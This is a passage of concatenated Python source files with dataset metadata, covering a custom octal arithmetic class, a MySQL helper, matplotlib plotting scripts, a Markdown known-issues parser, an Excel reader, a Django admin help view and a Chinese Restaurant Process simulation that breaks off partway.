print(\"Mul overflow table: \\n\")\n print_table(self.mulOV)\n\n def sum_ov(self, i, j):\n ov = self.zero\n r = self.zero\n while r != j:\n i = self.plus_one[i]\n r = self.plus_one[r]\n if i == self.zero:\n ov = self.plus_one[self.zero]\n return i, ov\n\n def mul_ov(self, i, j):\n ov = self.zero\n m = self.zero\n s = self.zero\n while m != j:\n s, current_ov = self.sum_ov(s, i)\n ov = self.sum_ov(ov, current_ov)[0]\n m = self.plus_one[m]\n return s, ov\n\n#16723450\nclass Num:\n a = Arithmetic(alphabet='01234567', plus_one='16723450')\n r = a.r\n n = a.n\n zero = a.zero\n one = a.one\n order = a.order\n alphabet = a.alphabet\n plus_one = a.plus_one\n add, addOV, mul, mulOV = a.add, a.addOV, a.mul, a.mulOV\n min = alphabet[order[-3]] + alphabet[order[0]]*(r-1)\n max = alphabet[order[-4]] + alphabet[order[-1]]*(r-1)\n\n def __init__(self, arg=a.alphabet[a.zero]*a.r):\n self.remainder = None\n if len(arg) > Num.r:\n c.ErrorText = \"Too many symbols in a word: {} !\".format(arg) + \" Max is {}\".format(Num.r)\n raise ArithmeticError\n if isinstance(arg, list):\n arg = ''.join([str(x) for x in arg])\n for j in arg:\n if j not in Num.alphabet:\n c.ErrorText = \"Wrong symbol in a word: {} : \".format(arg) + \"{}. Set of correct symbols for word: {}\".format(j, Num.alphabet)\n raise ArithmeticError\n self.word = [Num.zero]*(Num.a.r - len(arg)) + [Num.a.alphabet.index(x) for x in arg]\n\n def __getitem__(self, item):\n assert item < Num.a.r\n return self.word[item]\n\n def __setitem__(self, key, value):\n assert key < Num.a.r\n self.word[key] = value\n\n def __add__(self, other):\n carry_over = Num.a.zero\n overflow = Num.a.zero\n isNeg1, isNeg2 = [1 if x[0] in Num.a.order[-3:] else 0 for x in (self, other)]\n res = Num()\n for i in reversed(range(Num.a.r)):\n sum = Num.add[self[i], other[i]]\n overflow = Num.addOV[self[i], other[i]]\n res[i] = Num.add[sum, carry_over]\n carry_over = overflow if overflow else Num.addOV[sum, carry_over]\n isNeg = 1 if res[0] in Num.order[-3:] else 0\n if carry_over or (isNeg1 == isNeg2 and isNeg1 != isNeg):\n c.OverflowFlag = True\n return res\n\n def __mul__(self, other):\n res = Num()\n k = 0\n for i in reversed(range(Num.r)):\n tmp = Num()\n ov_mul = ov_sum = Num.zero\n for j in reversed(range(Num.r)):\n if j-k < 0:\n break\n product = Num.mul[self[j], other[i]]\n tmp[j-k] = Num.add[product, ov_mul]\n ov1 = Num.addOV[product, ov_mul]\n ov2 = Num.addOV[tmp[j-k], ov_sum]\n tmp[j-k] = Num.add[tmp[j-k], ov_sum]\n ov_mul = Num.mulOV[self[j], other[i]]\n ov_sum = Num.add[ov1, ov2]\n # if not (Num(str(ov_sum))+Num(str(ov_mul))).isnull():\n # c.OverflowFlag = True\n k += 1\n res = res + tmp\n return res\n\n def __sub__(self, other):\n complement = Num()\n for j in range(Num.a.r):\n complement[j] = np.where(Num.add[other[j]] == Num.a.order[-1])[0][0]\n complement = complement + Num([Num.zero]*(Num.r-1) + [Num.one])\n return self + complement\n\n def compare(self, other, isStrict=False):\n k = 0\n while k < Num.r and self[k] == other[k]:\n k += 1\n if k == Num.r:\n return not isStrict\n isNeg1, isNeg2 = [1 if x[0] in Num.a.order[-3:] else 0 for x in (self, other)]\n if not isNeg1 and not isNeg2:\n if Num.a.order.index(self[k]) < Num.a.order.index(other[k]):\n return False\n return True\n if isNeg1 and not isNeg2:\n return False\n if isNeg2 and not isNeg1:\n return True\n return other.abc().compare(self.abc, isStrict)\n\n def isnull(self):\n for d in self.word:\n if d != self.zero:\n return False\n return True\n\n def abc(self):\n if self[0] in (Num.order[-3:]):\n return Num()-self\n return self\n\n def __truediv__(self, other):\n res = Num()\n if other.isnull() and self.isnull():\n c.ErrorText = \"[-\" + (Num()-Num(Num.min)).__repr__() + \", \" + (Num(Num.max)).__repr__() + \"]\"\n raise ArithmeticError\n if other.isnull():\n c.ErrorText = \"Division by zero: undefined value!\"\n raise ArithmeticError\n isPos1 = self.compare(Num(), True)\n isPos2 = other.compare(Num(), True)\n a = self.abc()\n b = other.abc()\n while a.compare(b):\n a = a - b\n res = res + Num(Num.a.alphabet[Num.one])\n\n res.remainder = a\n if not isPos1:\n if a.isnull():\n res = Num()-res\n res.remainder = a\n return res\n res = Num() - (res+Num(Num.alphabet[Num.one]))\n res.remainder = b-a\n return res\n if isPos1 and not isPos2:\n res = Num() - res\n res.remainder = a\n return res\n return res\n\n def __repr__(self):\n res = ''\n #if self.isoverflow:\n # res += \"Warning: overflow happened!\\n\"\n if self.isnull():\n return res + Num.a.alphabet[Num.zero]\n tmp = self\n if self[0] in Num.order[-3:]:\n res += '-'\n tmp = Num(list(map(lambda x: Num.a.order[Num.n-1-Num.a.order.index(x)], self.word)))+Num(Num.alphabet[Num.one])\n res += (''.join(map(lambda x: Num.a.alphabet[x], tmp.word))).lstrip(Num.alphabet[Num.zero])\n if self.remainder is not None:\n res = \"div = \" + res + \" mod = \" + self.remainder.__repr__()\n return res\n", "sub_path": "operations.py", "file_name": "operations.py", "file_ext": "py", "file_size_in_byte": 7142, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pandas.DataFrame", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 21, "usage_type": "call"}, {"api_name": "config.ErrorText", "line_number": 76, "usage_type": "attribute"}, {"api_name": "config.ErrorText", "line_number": 82, "usage_type": "attribute"}, {"api_name": "config.OverflowFlag", "line_number": 106, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 134, "usage_type": "call"}, {"api_name": "config.ErrorText", "line_number": 169, "usage_type": "attribute"}, {"api_name": "config.ErrorText", "line_number": 172, "usage_type": "attribute"}]} +{"seq_id": "457999092", "text": "#!/usr/bin/env python\n#_*_coding:utf-8_*_\n#import json,random\nimport pymysql\nimport time\nimport json\nfrom tools.tools import Get_Sql_Insert,Get_Sql_Detele,Get_Sql_Select,Get_Sql_Update\n\nclass DB: \n conn = None\n db = None\n host = None\n def __init__(self, host, mysql_user, mysql_pass, mysql_db):\n self.host = host\n self.mysql_user = mysql_user\n self.mysql_pass = mysql_pass\n self.mysql_db = mysql_db\n def connect(self):\n #self.conn = pymysql.connect(host=self.host, user=self.mysql_user, passwd=self.mysql_pass, db=self.mysql_db, charset=\"utf8\", connect_timeout=600, compress=True,cursorclass = pymysql.cursors.DictCursor)\n self.conn = pymysql.connect(host=self.host, user=self.mysql_user, passwd=self.mysql_pass, db=self.mysql_db, charset=\"utf8\", connect_timeout=600,)\n\n self.conn.autocommit(True)\n def execute(self, sql):\n try:\n cur = self.conn.cursor()\n cur.execute(sql)\n except (AttributeError, pymysql.OperationalError):\n try:\n cur.close()\n self.conn.close()\n except:\n pass\n time.sleep(1)\n try:\n self.connect()\n print (\"reconnect DB\")\n cur = self.conn.cursor()\n cur.execute(sql)\n except (AttributeError, pymysql.OperationalError):\n time.sleep(2)\n self.connect()\n print (\"reconnect DB\")\n cur = self.conn.cursor()\n cur.execute(sql)\n \n return cur\n def Mysql_2_Json(self,data,level=1):\n if level :\n cur = self.execute(data)\n SqlData = cur.fetchall()\n Fields = cur.description\n column_list = []\n rows=[]\n JsonData={}\n for i in Fields:\n column_list.append(i[0])\n total = 0 \n for row in SqlData: \n result = {}\n total = total + 1 \n for x in range(len(column_list)): \n result[column_list[x]] = row[x] \n #jsondata=json.dumps(result,ensure_ascii=False) \n rows.append(result)\n JsonData[\"total\"] = total\n JsonData[\"rows\"]= rows\n return json.dumps(JsonData)\n else :\n data = json.loads(data)\n if data[\"SqlType\"] == \"Insert\":\n for cur in data[\"rows\"]:\n print(type(cur))\n a= Get_Sql_Insert(data[\"SqlTable\"],cur)\n print(a)\n elif data[\"SqlType\"] == \"Detele\":\n for cur in data[\"rows\"]:\n print(type(cur))\n sql= Get_Sql_Detele(data[\"SqlTable\"],cur)\n print(self.execute(sql))\n \n elif data[\"SqlType\"] == \"Update\":\n for cur in data[\"rows\"]:\n UUID={}\n UUID[\"UUID\"]=cur[\"UUID\"]\n cur.pop(\"UUID\")\n cur.pop(\"Asset_Number\")\n sql= Get_Sql_Update(data[\"SqlTable\"],cur,UUID)\n print(self.execute(sql))\n \n elif data[\"SqlType\"] == \"Select\":\n print(data)\n for cur in data[\"rows\"]:\n print(type(cur))\n a= Get_Sql_Select(data[\"SqlTable\"],cur)\n print(a)\n else:\n print(\"error\")\n \n", "sub_path": "dbutil/dbutil.py", "file_name": "dbutil.py", "file_ext": "py", "file_size_in_byte": 3576, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pymysql.connect", "line_number": 20, "usage_type": "call"}, {"api_name": "pymysql.OperationalError", "line_number": 27, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 33, "usage_type": "call"}, {"api_name": "pymysql.OperationalError", "line_number": 39, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 40, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 67, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 69, "usage_type": "call"}, {"api_name": "tools.tools.Get_Sql_Insert", "line_number": 73, "usage_type": "call"}, {"api_name": "tools.tools.Get_Sql_Detele", "line_number": 78, "usage_type": "call"}, {"api_name": "tools.tools.Get_Sql_Update", "line_number": 87, "usage_type": "call"}, {"api_name": "tools.tools.Get_Sql_Select", "line_number": 94, "usage_type": "call"}]} +{"seq_id": "223350589", "text": "import math\nimport matplotlib.mlab as mlab\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\n\ndef gen_x(xmin, xmax, count):\n xs = []\n dx = (xmax - xmin) / count\n for k in range(count + 1):\n x = xmin + k * dx\n xs.append(x)\n return xs\n\ndef gen_ewave(xs, alpha, ys, labels):\n ys.append(list(map(lambda x : 2 * alpha * x / (math.exp(-alpha * x) + math.exp(+alpha * x)), xs)))\n labels.append(\"{}*x/(exp(-{}*x) + exp(+{}*x))\".format(alpha, alpha, alpha))\n\ndef gen_pwave(xs, degree, ys, labels):\n ys.append(list(map(lambda x : x / (1 + x**degree), xs)))\n labels.append(\"x/(1+x^{})\".format(degree))\n\ndef gen_snorm(xs, ys, labels):\n ys.append(list(map(lambda x : x / math.sqrt(1 + x**2), xs)))\n labels.append(\"x/sqrt(1+x^2)\")\n\ndef gen_tanh(xs, ys, labels):\n ys.append(list(map(lambda x : math.tanh(x), xs)))\n labels.append(\"tanh(x)\")\n\ndef gen_sin(xs, ys, labels):\n ys.append(list(map(lambda x : math.sin(x), xs)))\n labels.append(\"sin(x)\")\n\ndef plot(ppath, title, xs, ys, labels, styles):\n with PdfPages(ppath) as pdf:\n plt.xlabel(\"x\", fontsize = \"smaller\")\n plt.ylabel(\"y\", fontsize = \"smaller\")\n plt.title(title, weight = \"bold\")\n for y, label, style in zip(ys, labels, styles):\n plt.plot(xs, y, style, label = label)\n plt.legend(fontsize = \"smaller\", loc = \"upper left\")\n plt.grid(True)\n pdf.savefig()\n plt.close()\n\ndef plot_pwaves(ppath, xmin = -10, xmax = 10):\n xs = gen_x(xmin, xmax, 1000)\n ys = []\n labels = []\n gen_pwave(xs, 2, ys, labels)\n gen_pwave(xs, 4, ys, labels)\n gen_pwave(xs, 6, ys, labels)\n gen_pwave(xs, 8, ys, labels)\n plot(ppath, \"polynomial wave activations\", xs, ys, labels, [\"r-\", \"g-\", \"b-\", \"k-\"])\n\ndef plot_ewaves(ppath, xmin = -10, xmax = 10):\n xs = gen_x(xmin, xmax, 1000)\n ys = []\n labels = []\n gen_ewave(xs, 1, ys, labels)\n gen_ewave(xs, 2, ys, labels)\n gen_ewave(xs, 3, ys, labels)\n gen_ewave(xs, 4, ys, labels)\n plot(ppath, \"exponential wave activations\", xs, ys, labels, [\"r-\", \"g-\", \"b-\", \"k-\"])\n\ndef plot_snorms(ppath, xmin = -10, xmax = 10):\n xs = gen_x(xmin, xmax, 1000)\n ys = []\n labels = []\n gen_snorm(xs, ys, labels)\n gen_tanh(xs, ys, labels)\n gen_sin(xs, ys, labels)\n gen_pwave(xs, 2, ys, labels)\n plot(ppath, \"[-1, +1] normalization activations\", xs, ys, labels, [\"r-\", \"g-\", \"b-\", \"k-\"])\n\nplot_pwaves(\"activations_pwave.pdf\")\nplot_ewaves(\"activations_ewave.pdf\")\nplot_snorms(\"activations_snorm.pdf\")\n", "sub_path": "scripts/plot_activations.py", "file_name": "plot_activations.py", "file_ext": "py", "file_size_in_byte": 2815, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "math.exp", "line_number": 15, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 23, "usage_type": "call"}, {"api_name": "math.tanh", "line_number": 27, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_pdf.PdfPages", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}]} +{"seq_id": "540072042", "text": "import numpy as np\nimport math\nimport matplotlib.pyplot as plt\nimport scipy.optimize as sp\n\n\nge = 9.81\ngm = 3.711\n\nrhoe = 1.225\nrhom = 0.01457\n\nmum = 1.422*10**-5\nmue = 1.789*10**-5\n\nvm = mum/rhom\nve = mue/rhoe\n\nc = 0.20\n\nVMrange = np.arange(10, 200.1,0.1)\n\nVErange = np.arange(1, 50.05, 0.05)\n\n\ndef func1(VE):\n out = (gm/ge)*(rhoe/rhom)*VE*VE/math.log((VE*c/(100*ve)),10)\n return out\ndef func2(VM):\n out = VM*VM/math.log(VM*c/(100*vm),10) - func1(VE)\n return out\n\nhrange = np.linspace(0, 10000, 5)\nfor j in range(len(hrange)):\n H = hrange[j]\n Tm = -31 - 0.000998*H\n Te = 15.04 - 0.00649*H\n\n pm = 0.699*math.exp(-0.00009*H)\n pe = 101.29*((Te+273.1)/288.08)**5.256\n\n rhom = pm/(0.1921*(Tm + 273.1))\n rhoe = pe/(0.2869*(Te + 273.1))\n\n\n PRe = []\n PRm = []\n Frac = []\n R = []\n ym = []\n ye = []\n\n for i in range(len(VErange)):\n VE = VErange[i]\n thinge = func1(VE)\n\n #Finding the root of the function calculating the velocity fraction depending on earth cruise speed\n\n VM = float(sp.brentq(func2, 1, 1000))\n ye.append(VM/VE)\n ym.append(VM)\n Ree = VE*c/ve\n Rem = VM*c/vm\n frac = math.sqrt((math.log(Ree/100)/math.log(Rem/100))*((gm/ge)**3)*(rhoe/rhom))\n Rfrac = (ge/gm)*(math.log(VM*c/(100*vm),10)/math.log(VE*c/(100*ve),10))\n Cd = 1.15*2*0.075/(math.log(Ree/100)**2)\n Pre = 0.5*rhoe*Cd*30*VE*VE*VE\n Prm = Pre*frac\n PRe.append(Pre)\n PRm.append(Prm)\n Frac.append(frac)\n R.append(Rfrac)\n\n fontsize = 20\n plt.subplot(221)\n plt.plot(VErange, ye, label = 'Altitude: '+str(H)+'m')\n plt.title('Earth cruise velocity vs V-fraction')\n plt.xlabel(r'$V_{C_E}[\\frac{m}{s}]$',fontsize = fontsize)\n plt.ylabel(r'$\\frac{V_{C_M}}{V_{C_E}}$', fontsize = fontsize)\n plt.grid()\n\n plt.subplot(222)\n plt.plot(VErange, ym, label = 'Altitude: '+str(H)+'m')\n plt.title(r'$V_{C_E}$'+'vs'+r'$V_{C_M}$')\n plt.xlabel(r'$V_{C_E}[\\frac{m}{s}]$', fontsize = fontsize)\n plt.ylabel(r'$V_{C_M}[\\frac{m}{s}]$', fontsize = fontsize)\n plt.grid()\n\n plt.subplot(223)\n plt.title('Range fraction')\n plt.plot(VErange, R, label = 'Altitude: '+str(H)+'m')\n plt.xlabel(r'$V_{C_E}[\\frac{m}{s}]$', fontsize = fontsize)\n plt.ylabel(r'$\\frac{R_M}{R_E}$', fontsize = fontsize)\n # plt.subplot(223)\n # plt.title('Power Fraction')\n # plt.plot(PRe, Frac)\n # plt.xlabel(r'$V_E$', fontsize = fontsize)\n # plt.ylabel(r'$\\frac{P_{R_M}}{P_{R_E}}$', fontsize = fontsize)\n plt.grid()\n plt.subplot(224)\n plt.plot(PRe, PRm, label = 'Altitude: '+str(H)+'m')\n plt.xlabel(r'$P_{R_E}[W]$', fontsize = fontsize)\n plt.ylabel(r'$P_{R_M}[W]$', fontsize = fontsize)\n plt.grid()\n plt.legend(loc = 4)\nplt.show()", "sub_path": "concept/single/Comparison.py", "file_name": "Comparison.py", "file_ext": "py", "file_size_in_byte": 2793, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "numpy.arange", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 23, "usage_type": "call"}, {"api_name": "math.log", "line_number": 27, "usage_type": "call"}, {"api_name": "math.log", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 33, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 39, "usage_type": "call"}, {"api_name": "scipy.optimize.brentq", "line_number": 59, "usage_type": "call"}, {"api_name": "scipy.optimize", "line_number": 59, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 64, "usage_type": "call"}, {"api_name": "math.log", "line_number": 64, "usage_type": "call"}, {"api_name": "math.log", "line_number": 65, "usage_type": "call"}, {"api_name": "math.log", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}]} +{"seq_id": "653465890", "text": "\nimport xlrd\n\n\ndef read_excel_dict(file):\n l = []\n wb = xlrd.open_workbook(filename=file) # 打开文件\n # print(wb.sheet_names()) # 获取所有表格名字\n\n sheet1 = wb.sheet_by_index(0) # 通过索引获取表格\n # print(sheet1)\n # print(sheet1.name, sheet1.nrows, sheet1.ncols)\n\n for i in range(1, sheet1.nrows):\n # l.append(sheet1.row_values(i))\n d = {}\n for j in range(sheet1.ncols):\n d[sheet1.row_values(0)[j]] = sheet1.row_values(i)[j]\n l.append(d)\n\n # print(l)\n return l\n\n\ndef read_excel_list(file):\n l = []\n wb = xlrd.open_workbook(filename=file) # 打开文件\n\n sheet1 = wb.sheet_by_index(0) # 通过索引获取表格sheet页\n for i in range(1, sheet1.nrows):\n d = sheet1.row_values(i) # 通过行号获取内容\n l.append(d) # 添加行里面的内容\n return l\n\n\nif __name__ == '__main__':\n excel_list = read_excel_list('test.xlsx')\n print(excel_list)", "sub_path": "day04/read_excel.py", "file_name": "read_excel.py", "file_ext": "py", "file_size_in_byte": 976, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "xlrd.open_workbook", "line_number": 7, "usage_type": "call"}, {"api_name": "xlrd.open_workbook", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "479003947", "text": "'''This script will parse the current known issues topic from Azure Stack. \nThe script doesn't validate. The best approach might have been to convert.\n\n10/14/2020\n\n'''\n\nfrom bs4 import BeautifulSoup\nimport markdown\nfrom markupsafe import Markup, escape\nimport csv\n\n# update variables\n\nKNOWNISSUES = r\"C:\\git\\mb\\azs-modular-poc\\data\\working\\2005_known_issues.md\"\nKNOWNISSUESTABLE = \"C:\\\\git\\\\mb\\\\azs-modular-poc\\\\data\\\\reports\\\\raw_parse_2005_known_issues.csv\"\n\n\ndef get_textfromMD(path):\n '''Return text from a MD filename path'''\n textout = \"\"\n fh = open(path, \"r\")\n for line in fh:\n textout += line\n fh.close()\n return textout\n\n\ndef write_csv(outbody, path):\n '''Write CSV file to the path.'''\n csvout = open(path, 'w', newline=\"\")\n csvwrite = csv.writer(csvout)\n for r in outbody:\n try:\n csvwrite.writerow(r)\n except Exception as e:\n print(\"An error: {}\".format(e))\n csvout.close()\n\n\ndef main():\n '''This is the main logic of parsing the known issues markdown file.'''\n rawtext = get_textfromMD(KNOWNISSUES)\n htmlfile = markdown.markdown(rawtext)\n soup = BeautifulSoup(htmlfile, 'html.parser')\n\n knownissuestable = []\n knownissuestable.append([\"area\", \"title\", \"applicable\", \"cause\", \"remediation\", \"occurance\"])\n\n # get area body\n body_html_string = soup.prettify()\n areas = body_html_string.split(\"

\")\n for a in areas:\n a = \"

\" + a\n a_soup = BeautifulSoup(a,'html.parser')\n area = a_soup.findAll(\"h2\")[0].get_text().strip()\n bodies_string = a_soup.prettify()\n bodies = bodies_string.split(\"

\")\n record = []\n for b in bodies:\n b = \"

\" + b\n b_soup = BeautifulSoup(b,'html.parser')\n title = escape(b_soup.findAll(\"h3\")[0].get_text().strip())\n print(\"Getting {}...\".format(title))\n raw_body = escape(b_soup.get_text()).replace(\"\\n\", \"\\\\n\")\n raw_body = escape(b_soup.get_text()).replace(\"\\\\n\\\\n\", \"\\\\n\")\n raw_body = \" \".join(raw_body.split())\n if raw_body.find(\"Applicable\") > 0: \n applicable = raw_body[raw_body.find(\"Applicable\")+11:raw_body.find(\"Cause\")].strip()\n else:\n applicable = \"NA\"\n if raw_body.find(\"Cause\") > 0:\n cause = raw_body[raw_body.find(\"Cause\")+6:raw_body.find(\"Remediation\")].strip()\n else:\n cause = \"NA\"\n if raw_body.find(\"Remediation\") > 0:\n remediation = raw_body[raw_body.find(\"Remediation\")+12:raw_body.find(\"Occurrence\")].strip()\n else:\n remediation = \"NA\"\n if raw_body.find(\"Occurrence\") > 0:\n index_occ_start = raw_body.find(\"Occurrence\")+11\n index_occ_end = raw_body[index_occ_start:].find(\"\\n\")\n occurrence = raw_body[index_occ_start:index_occ_end].strip()\n else:\n occurrence = \"NA\"\n record = [area, title, applicable, cause, remediation, occurrence]\n knownissuestable.append(record)\n write_csv(knownissuestable, KNOWNISSUESTABLE)\n\n\nif __name__ == \"__main__\":\n main()\n\n", "sub_path": "scripts/migrate/parse_2005_known_issues.py", "file_name": "parse_2005_known_issues.py", "file_ext": "py", "file_size_in_byte": 3211, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "csv.writer", "line_number": 32, "usage_type": "call"}, {"api_name": "markdown.markdown", "line_number": 44, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 45, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 55, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 62, "usage_type": "call"}, {"api_name": "markupsafe.escape", "line_number": 63, "usage_type": "call"}, {"api_name": "markupsafe.escape", "line_number": 65, "usage_type": "call"}, {"api_name": "markupsafe.escape", "line_number": 66, "usage_type": "call"}]} +{"seq_id": "545453769", "text": "from django.contrib import admin\nfrom django.conf.urls import url\nfrom django.shortcuts import render\n\n__all__ = ['HAASAdmin']\n\nclass HAASAdmin(admin.ModelAdmin):\n \"\"\"\n Provide Help Menus in Admin Site\n \n The default admin site is pretty sparse. Lots of Postgres-related concepts\n should be explained for uninitiated, and yet those elements are missing \n from the admin. This override for the base model admin class provides\n context-sensitive help to describe usage scenarios.\n\n Each module can have a help template located at:\n \n templates/admin/haas/[module]/help.html\n \"\"\"\n\n def get_urls(self):\n urls = super(HAASAdmin, self).get_urls()\n my_urls = [\n url(r'^help/$', self.help),\n ]\n return my_urls + urls\n\n def help(self, request):\n \"\"\"\n Display the Proper Help Template Corresponding to the Active Module\n \"\"\"\n context = dict(\n self.admin_site.each_context(request),\n app_label = self.model._meta.app_label,\n opts = self.model._meta\n )\n modname = str(request.path.split('/')[-3])\n return render(request, 'admin/haas/' + modname + '/help.html', context)\n", "sub_path": "haas/admin/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 1217, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 7, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 24, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "46619547", "text": "\"\"\"Chinese Restaurant Process\n\nThis scripts simulated CRP and plots 3 snapshot-plots \ndepicting changes in the clausters\n\"\"\"\nimport numpy as np\nfrom numpy.random import dirichlet, multivariate_normal, choice\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MaxNLocator\nimport sys\n\n\ndef normalize(urn_contents):\n urn_contents = [vals for vals in urn_contents.values()]\n\n sum_contents = np.sum(urn_contents)\n return np.array(urn_contents) / sum_contents\n\n\nalpha = 5\n\"\"\"\ndict format: component_num -> # of nodes in cluster\n'component 0' corresponds to the \"special ball\" (in Polya Urn terminology)\n'alpha': weight associated with the special ball\n\"\"\"\nurn_contents = dict({0: alpha, 1: 1})\ncluster_counter = 2\n\nfig, ax = plt.subplots(1, 3, figsize=(12, 6), sharey=True)\nfor i in range(3):\n 